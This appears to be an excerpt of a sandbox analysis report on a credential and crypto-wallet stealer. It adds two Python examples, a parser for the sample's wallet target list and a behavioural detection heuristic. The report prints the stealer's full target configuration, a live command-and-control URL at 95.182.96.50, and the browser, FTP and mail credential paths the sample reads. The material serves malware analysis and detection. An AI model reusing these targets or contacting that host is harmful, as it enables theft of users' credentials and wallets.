Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.00000000011A9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\exodus.wallet\\info.seco
Source: 9JtNIXVedn.exe, 00000000.00000002.1657570920.0000000003118000.00000040.00000020.00020000.00000000.sdmp String found in binary or memory: en\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.00000000011A9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\jaxx\Local Storage\file__0.localstorage
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.00000000011A9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\simple-storage.json*
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.00000000011A9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\*.**
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.00000000011A9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/2aced82320799c96.phpge\multidoge.wallet.*
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.00000000011A9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://95.182.96.50/2aced82320799c96.phpdus.wallet\\seed.seco2
Source: 9JtNIXVedn.exe, 00000000.00000002.1656380695.000000000118D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\*.**
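The pipe-delimited string recovered from the 0x3118000 memory region above is the stealer's wallet-grabber target list: five fields per entry (display name, root code, path under that root, filename mask, recurse flag). The following parser is an added example written for this page, not code from the sample or from the sandbox; it works on an excerpt of that string. Root code 1 resolving under %APPDATA% is consistent with the "File opened" paths under C:\Users\user\AppData\Roaming further down the report; mapping root code 2 to the user profile directory is an assumption based on the .chia\mainnet entries, and the environment values used are constructed for the example.

```python
"""Parse the pipe-delimited wallet grabber configuration recovered above.

Each target is five pipe-separated fields:
    display name | root code | path under the root | filename mask | recurse flag
Root code 1 resolves under %APPDATA% (consistent with the report's file opens
under C:\\Users\\user\\AppData\\Roaming). Root code 2 is ASSUMED here to be the
user profile directory, because the Chia entries point at \\.chia\\mainnet\\.
"""
from __future__ import annotations

import fnmatch
from dataclasses import dataclass
from pathlib import PureWindowsPath
from typing import Optional

# Root code -> environment variable holding the base directory (code 2 is an assumption).
ROOTS = {"1": "APPDATA", "2": "USERPROFILE"}

# Excerpt of the configuration string found in the memory dump on this page.
# The truncated leading entry ("en\wallets\|*.*|1|") is deliberately left out.
SAMPLE_CONFIG = (
    r"Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|"
    r"Ethereum|1|\Ethereum\|keystore|0|"
    r"Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|"
    r"Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|"
    r"Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|"
)


@dataclass(frozen=True)
class GrabTarget:
    name: str
    root: str        # "1" or "2"
    rel_path: str    # as written in the config, with leading/trailing backslash
    mask: str        # fnmatch-style filename pattern
    recursive: bool  # "1" => descend into subdirectories


def parse_grabber_config(blob: str) -> list[GrabTarget]:
    """Split the pipe-delimited blob into GrabTarget records (5 fields each)."""
    fields = blob.split("|")
    if fields and fields[-1] == "":      # the blob ends with a separator
        fields.pop()
    if len(fields) % 5 != 0:
        raise ValueError(f"{len(fields)} fields is not a multiple of 5; truncated config?")
    targets = []
    for i in range(0, len(fields), 5):
        name, root, rel, mask, rec = fields[i:i + 5]
        if root not in ROOTS:
            raise ValueError(f"unknown root code {root!r} in entry {name!r}")
        targets.append(GrabTarget(name, root, rel, mask, rec == "1"))
    return targets


def target_directory(target: GrabTarget, env: dict[str, str]) -> str:
    """Absolute directory the grabber will enumerate for this target."""
    base = PureWindowsPath(env[ROOTS[target.root]])
    return str(base / target.rel_path.strip("\\"))


def explain_access(path: str, targets: list[GrabTarget], env: dict[str, str]) -> Optional[GrabTarget]:
    """Return the config entry that accounts for an observed file access, if any."""
    accessed = PureWindowsPath(path)
    for t in targets:
        try:
            rel = accessed.relative_to(PureWindowsPath(target_directory(t, env)))
        except ValueError:
            continue                    # not under this target's directory
        if not rel.parts:
            continue                    # the directory itself, not a file inside it
        if len(rel.parts) > 1 and not t.recursive:
            continue                    # nested file, but this entry is non-recursive
        if fnmatch.fnmatchcase(rel.parts[-1].lower(), t.mask.lower()):
            return t
    return None


if __name__ == "__main__":
    # Constructed environment matching the sandbox user seen in the report.
    env = {"APPDATA": r"C:\Users\user\AppData\Roaming", "USERPROFILE": r"C:\Users\user"}
    for t in parse_grabber_config(SAMPLE_CONFIG):
        print(f"{t.name:28s} {target_directory(t, env)}\\{t.mask}  recursive={t.recursive}")
```

Feeding the full string from the memory dump through parse_grabber_config gives the complete list of directories the sample will sweep, which is the quickest way to turn this report into a per-host scoping checklist; explain_access maps an individual "File opened" line back to the configuration entry that caused it.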
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\prefs.js
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite-shm
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite-wal
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite-shm
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite-wal
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\Desktop\9JtNIXVedn.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
Source: Yara match File source: 00000000.00000002.1656380695.000000000118D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1656380695.0000000001148000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 9JtNIXVedn.exe PID: 7776, type: MEMORYSTR
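The file and registry accesses listed above are what make this sample detectable behaviourally: one process reading browser login databases, Firefox cookie stores, the FileZilla server list, a dozen wallet directories and the Outlook profile keys within a single run. The detection below is an added example, not a rule shipped by the sandbox or by any product; it groups the paths from this report into categories and flags a process that touches three or more of them, so that a browser or mail client reading only its own store is not flagged. The event tuples, the benign process names and PIDs, and the threshold are constructed for the example.

```python
"""Score processes by the credential-store categories they touch.

The paths and registry keys come from the "File opened" / "Key opened" lines
on this page; grouping them into categories and the threshold are choices made
for this example, not something the report states. Events are constructed.
"""
from __future__ import annotations

import re
from collections import defaultdict

CATEGORIES = {
    "browser": [
        r"\\User Data\\[^\\]+\\(Login Data|History|Web Data|Network\\Cookies)",
        r"\\Mozilla\\Firefox\\Profiles\\[^\\]+\\(cookies|places)\.sqlite",
    ],
    "ftp": [r"\\FileZilla\\recentservers\.xml$"],
    "wallet": [
        r"\\Roaming\\(Bitcoin|Electrum|Electrum-LTC|Exodus|ElectronCash|MultiDoge|jaxx|"
        r"com\.liberty\.jaxx|atomic|atomic_qt|Binance|Coinomi|Ledger Live|Guarda)\\",
        r"\\monero-project\\monero-core$",
    ],
    "mail": [r"\\Windows Messaging Subsystem\\Profiles\\"],
}
COMPILED = {cat: [re.compile(p, re.IGNORECASE) for p in pats] for cat, pats in CATEGORIES.items()}

# A legitimate browser or mail client touches one category; a stealer sweeps several.
THRESHOLD = 3


def classify(target: str) -> str | None:
    """Map an accessed path or registry key to a category, or None if uninteresting."""
    for cat, pats in COMPILED.items():
        if any(p.search(target) for p in pats):
            return cat
    return None


def categories_by_process(events):
    """events: iterable of (image, pid, target). Returns {(image, pid): {category, ...}}."""
    touched = defaultdict(set)
    for image, pid, target in events:
        cat = classify(target)
        if cat is not None:
            touched[(image, pid)].add(cat)
    return dict(touched)


def flagged(events, threshold: int = THRESHOLD):
    """Processes that touched at least `threshold` distinct categories."""
    return {proc for proc, cats in categories_by_process(events).items() if len(cats) >= threshold}


# Constructed event stream: the sample's accesses from this report plus benign noise.
U = r"C:\Users\user\AppData"
OUTLOOK_KEY = (r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion"
               r"\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001")
SAMPLE_EVENTS = [
    ("9JtNIXVedn.exe", 7776, U + r"\Local\Google\Chrome\User Data\Default\Login Data"),
    ("9JtNIXVedn.exe", 7776, U + r"\Local\Microsoft\Edge\User Data\Default\Network\Cookies"),
    ("9JtNIXVedn.exe", 7776, U + r"\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite"),
    ("9JtNIXVedn.exe", 7776, U + r"\Roaming\FileZilla\recentservers.xml"),
    ("9JtNIXVedn.exe", 7776, U + r"\Roaming\Exodus\exodus.wallet"),
    ("9JtNIXVedn.exe", 7776, U + r"\Roaming\Ledger Live\Session Storage"),
    ("9JtNIXVedn.exe", 7776, r"HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core"),
    ("9JtNIXVedn.exe", 7776, OUTLOOK_KEY),
    # Benign (constructed): each application reads only its own store.
    ("chrome.exe", 4120, U + r"\Local\Google\Chrome\User Data\Default\Login Data"),
    ("chrome.exe", 4120, U + r"\Local\Google\Chrome\User Data\Default\History"),
    ("OUTLOOK.EXE", 5212, OUTLOOK_KEY),
    ("filezilla.exe", 6380, U + r"\Roaming\FileZilla\recentservers.xml"),
]

if __name__ == "__main__":
    hits = flagged(SAMPLE_EVENTS)
    for proc, cats in categories_by_process(SAMPLE_EVENTS).items():
        print(proc, sorted(cats), "FLAGGED" if proc in hits else "")
```

The same grouping translates directly into a Sysmon FileCreate/RegistryEvent or EDR query: collect distinct categories per process and alert on breadth rather than on any single path, which is what separates a stealer's sweep from a browser opening its own Login Data.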

Remote Access Functionality

Source: Yara match File source: 00000000.00000002.1657570920.0000000003118000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1656380695.0000000001148000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 9JtNIXVedn.exe PID: 7776, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: 9JtNIXVedn.exe PID: 7776, type: MEMORYSTR
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Code function: 0_2_6CEA0C40 sqlite3_bind_zeroblob, 0_2_6CEA0C40
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Code function: 0_2_6CEA0D60 sqlite3_bind_parameter_name, 0_2_6CEA0D60
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Code function: 0_2_6CDC8EA0 sqlite3_clear_bindings, 0_2_6CDC8EA0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Code function: 0_2_6CEA0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob, 0_2_6CEA0B40
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Code function: 0_2_6CDC6410 bind,WSAGetLastError, 0_2_6CDC6410
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Code function: 0_2_6CDC60B0 listen,WSAGetLastError, 0_2_6CDC60B0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Code function: 0_2_6CDCC050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp, 0_2_6CDCC050
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Code function: 0_2_6CDC6070 PR_Listen, 0_2_6CDC6070
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Code function: 0_2_6CDCC030 sqlite3_bind_parameter_count, 0_2_6CDCC030
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Code function: 0_2_6CD522D0 sqlite3_bind_blob, 0_2_6CD522D0
Source: C:\Users\user\Desktop\9JtNIXVedn.exe Code function: 0_2_6CDC63C0 PR_Bind, 0_2_6CDC63C0